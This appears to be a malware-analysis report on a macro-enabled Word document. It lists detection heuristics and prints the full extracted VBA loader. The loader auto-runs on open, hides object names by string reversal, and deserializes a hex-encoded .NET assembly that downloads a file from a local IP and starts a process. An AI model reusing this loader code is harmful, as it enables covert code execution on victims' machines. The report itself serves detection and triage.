MALICIOUS
300
Risk Score
Heuristics 9
-
ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set DM1 = CreateObject(comida("MODLMX.tfosorciM")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set DM1 = CreateObject(comida("MODLMX.tfosorciM")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16894 bytes |
SHA-256: 169e5a82b167941d67bd3b6057a1e2d88c2737e5c2c64d5f2aa1a1cc53d9ab25 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 43 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function comida(c)
comida = StrReverse(c)
End Function
Sub DebugPrint(s)
End Sub
Private Function dh(hex)
On Error Resume Next
Dim DM1, EL1
Set DM1 = CreateObject(comida("MODLMX.tfosorciM"))
Set EL1 = DM1.createElement(comida("pmt"))
EL1.DataType = comida("xeh.nib")
EL1.Text = hex
dh = EL1.NodeTypedValue
End Function
Function rn()
On Error Resume Next
If ActiveDocument.Name <> comida("mcod.tseT") Then
Exit Function
End If
Dim s As String
s = "0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65"
s = s & "6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508"
s = s & "617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65"
s = s & "2E52656D6F74696E672E4D6573736167696E672E48656164657248616E646C657206060000004B6D73636F726C69622C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530383906070000000774617267657430090600000006090000000F53797374656D2E44656C6567"
s = s & "617465060A0000000D44796E616D6963496E766F6B650A04030000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300307033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E747279022F53797374"
s = s & "656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C646572090B000000090C000000090D00000004040000002F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657206000000044E616D650C417373656D626C794E616D6509436C6173734E616D65095369676E6174"
s = s & "7572650A4D656D626572547970651047656E65726963417267756D656E7473010101010003080D53797374656D2E547970655B5D090A0000000906000000090900000006110000002C53797374656D2E4F626A6563742044796E616D6963496E766F6B652853797374656D2E4F626A6563745B5D29080000000A010B0000000200000006120000002053797374656D2E586D6C2E5363"
s = s & "68656D612E586D6C56616C756547657474657206130000004D53797374656D2E586D6C2C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530383906140000000774617267657430090600000006160000001A53797374656D2E5265666C656374696F6E2E417373656D62"
s = s & "6C790617000000044C6F61640A0F0C00000000140000024D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000"
s = s & "00504500004C010300F36B77600000000000000000E00002210B013000000A00000008000000000000D6280000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000842800004F000000004000000C0400000000000000"
s = s & "0000000000000000000000006000000C0000004C2700001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000DC08000000200000000A000000020000000000000000000000000000200000602E727372630000000C0400"
s = s & "000040000000060000000C0000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001200000000000000000000000000004000004200000000000000000000000000000000B828000000000000480000000200050088200000C40600000300000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "000000000000000000000000000000BA02280E00000A72010000707201000070161F30280F00000A26731000000A720D00007072470000706F1100000A2A2203281200000A262A42534A4201000100000000000C00000076322E302E35303732370000000005006C00000018020000237E000084020000A002000023537472696E677300000000240500007C00000023555300A00500"
s = s & "00100000002347554944000000B00500001401000023426C6F620000000000000002000001471500000900000000FA0133001600000100000015000000020000000200000001000000120000000E0000000100000003000000000071010100000000000600E100E50106004E01E50106002E00B3010F0005020000060056009B010600C4009B010600A5009B01060035019B01060001"
s = s & "019B0106001A019B0106006D009B0106004200C60106002000C601060088009B010600500285010A00840214020A00620214020A00290214020A008C0114020E006F0257020E004802B3010000000001000000000001000100010010003B0200003D00010001005020000000008618AD01060001007F20000000008600450210000100000001006C010900AD0101001100AD01060019"
s = s & "00AD010A002900AD0110003100AD0110003900AD0110004100AD0110004900AD0110005100AD0110005900AD0110006100AD0115006900AD0110007100AD0110007900AD01060081007F021A00A100AD010600A10013002500A90079022B002E000B003A002E00130043002E001B0062002E0023006B002E002B0080002E003300AA002E003B00AA002E0043006B002E004B00B0002E"
s = s & "005300AA002E005B00AA002E006300D5002E006B00FF0043005B000C010480000001000000000000000000000000008F02000002000000000000000000000031000A00000000000200000000000000000000003100140200000000020000000000000000000000310085010000000000000000003C4D6F64756C653E006D73636F726C696200446F776E6C6F616446696C6500477569"
s = s & "644174747269627574650044656275676761626C6541747472696275746500436F6D56697369626C6541747472696275746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F"
s = s & "6E41747472696275746500417373656D626C794465736372697074696F6E41747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F7079726967687441747472696275746500417373656D626C79436F6D70616E794174747269627574650052"
s = s & "756E74696D65436F6D7061746962696C6974794174747269627574650070617468004578616D706C65417373656D626C792E646C6C0053797374656D004D657373616765426F7849636F6E0053797374656D2E5265666C656374696F6E002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F70536572766963657300"
s = s & "53797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053797374656D2E57696E646F77732E466F726D73004D657373616765426F78427574746F6E730054657374436C6173730052756E50726F63657373004F626A6563740053797374656D2E4E6574004469616C6F67526573756C7400576562436C69656E74005374"
s = s & "6172740053686F77004D657373616765426F78004578616D706C65417373656D626C790000000B54006500730074003200003968007400740070003A002F002F003100390032002E003100360038002E0030002E00310032002F00660069006C0065002E00740078007400003163003A005C00550073006500720073005C005000750062006C00690063005C00660069006C0065002E"
s = s & "007400780074000000000066B707945590B14AB3C8C3F4D6F71F2D00042001010803200001052001011111042001010E04200101020A000411450E0E1149114D052002010E0E05000112550E08B77A5C561934E0890801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010801000200000000001401000F4578616D706C65417373656D"
s = s & "626C790000290100244578616D706C6520417373656D626C7920666F7220446F744E6574546F4A53637269707400000501000000002401001F436F7079726967687420C2A9204A616D657320466F7273686177203230313700002901002435363539386631632D366438382D343939342D613339322D61663333376162653537373700000C010007312E302E302E3000000501000100"
s = s & "00000000000000F36B776000000000020000001C010000682700006809000052534453C3BDC55ACF2F0A49AED976707495C63A01000000433A5C55736572735C73656375726974795C546F6F6C735C446F744E6574546F4A5363726970742D6D61737465725C4578616D706C65417373656D626C795C6F626A5C7838365C52656C656173655C4578616D706C65417373656D626C792E"
s = s & "706462000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "000000000000000000000000000000AC2800000000000000000000C6280000002000000000000000000000000000000000000000000000B8280000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000"
s = s & "000000000000000100000000004800000058400000B00300000000000000000000B00334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066"
s = s & "006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B00410030000010053007400720069006E006700460069006C00650049006E0066006F000000EC020000010030003000300030003000340062003000000062002500010043006F006D006D0065006E007400730000004500780061006D0070006C006500200041007300730065"
s = s & "006D0062006C007900200066006F007200200044006F0074004E006500740054006F004A005300630072006900700074000000000022000100010043006F006D00700061006E0079004E0061006D0065000000000000000000480010000100460069006C0065004400650073006300720069007000740069006F006E00000000004500780061006D0070006C00650041007300730065"
s = s & "006D0062006C0079000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E003000000048001400010049006E007400650072006E0061006C004E0061006D00650000004500780061006D0070006C00650041007300730065006D0062006C0079002E0064006C006C00000062001F0001004C006500670061006C0043006F"
s = s & "007000790072006900670068007400000043006F0070007900720069006700680074002000A90020004A0061006D0065007300200046006F007200730068006100770020003200300031003700000000002A00010001004C006500670061006C00540072006100640065006D00610072006B00730000000000000000005000140001004F0072006900670069006E0061006C00460069"
s = s & "006C0065006E0061006D00650000004500780061006D0070006C00650041007300730065006D0062006C0079002E0064006C006C000000400010000100500072006F0064007500630074004E0061006D006500000000004500780061006D0070006C00650041007300730065006D0062006C0079000000340008000100500072006F006400750063007400560065007200730069006F"
s = s & "006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000D838000000000000000000"
s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
s = s & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000010D00000004000000091700000009060000000916000000061A0000002753797374656D2E5265666C656374696F6E2E417373656D626C79204C6F616428427974655B5D29080000000A0B"
ec = "TestClass"
Dim stm As Object, fmt As Object, al As Object
Set stm = CreateObject(comida("maertSyromeM.OI.metsyS"))
If stm Is Nothing Then
manifest = comida("reS.emitnuR.metsyS=digorp }7D4C9AA9D5A2-11BB-A873-5F39-FA7ABC0D{=dislc ssalCrlc<>/ 980E439165C5A77B=nekoTyeKcilbup 0.0.0.4=noisrev bilrocsm=eman ytitnedIylbmessa<>0.1=noisreVtsefinam 1v.msa:moc-tfosorcim-samehcs:nru=snlmx ylbmessa<>?sey=enoladnats 61-FTU=gnidocne 0.1=noisrev lmx?<")
manifest = manifest & comida("oC.metsyS=eman htoB=ledoMgnidaerht tsiLyarrA.snoitcelloC.metsyS=digorp }74386418F9CB-13DB-7A93-E554-647709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur rettamroFyraniB.yraniB.srettamroF.noitazilaireS.emitnuR.metsyS=eman htoB=ledoMgnidaerht rettamroFyraniB.yraniB.srettamroF.noitazilai")
manifest = manifest & comida(".metsyS=digorp }74388418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur gnidocnEIICSA.txeT.metsyS=eman htoB=ledoMgnidaerht gnidocnEIICSA.txeT.metsyS=digorp }74386418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur tsiLyarrA.snoitcell")
manifest = manifest & comida("Vemitnur maertSyromeM.OI.metsyS=eman htoB=ledoMgnidaerht maertSyromeM.OI.metsyS=digorp }74B86418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur mrofsnarT46esaBmorF.yhpargotpyrC.ytiruceS.metsyS=eman htoB=ledoMgnidaerht mrofsnarT46esaBmorF.yhpargotpyrC.ytiruceS")
manifest = manifest & "ersion=""v4.0.30319"" /></assembly>"
Set ax = CreateObject("Microsoft.Windows.ActCtx")
ax.ManifestText = manifest
Set stm = ax.CreateObject(comida("maertSyromeM.OI.metsyS"))
Set fmt = ax.CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = ax.CreateObject("System.Collections.ArrayList")
Else
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
End If
Dim dec
dec = dh(s)
For Each i In dec
stm.WriteByte i
Next i
stm.Position = 0
Dim n As Object, d As Object, o As Object
Set d = fmt.Deserialize_2(stm)
al.Add Empty
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(ec)
If Err.Number <> 0 Then
DebugPrint Err.Description
Err.Clear
End If
End Function
Sub AutoOpen()
rn
End Sub
Sub Document_Open()
rn
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 69632 bytes |
SHA-256: c056f6ff43130e6cf2f4a15620888314447ed37b31640eb055fe7e81e49f4007 |
|||
|
Detection
ClamAV:
Doc.Dropper.HexEncodedEXEHeader-9789587-1
Obfuscation or payload:
likely
Carved artifact contains 44 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.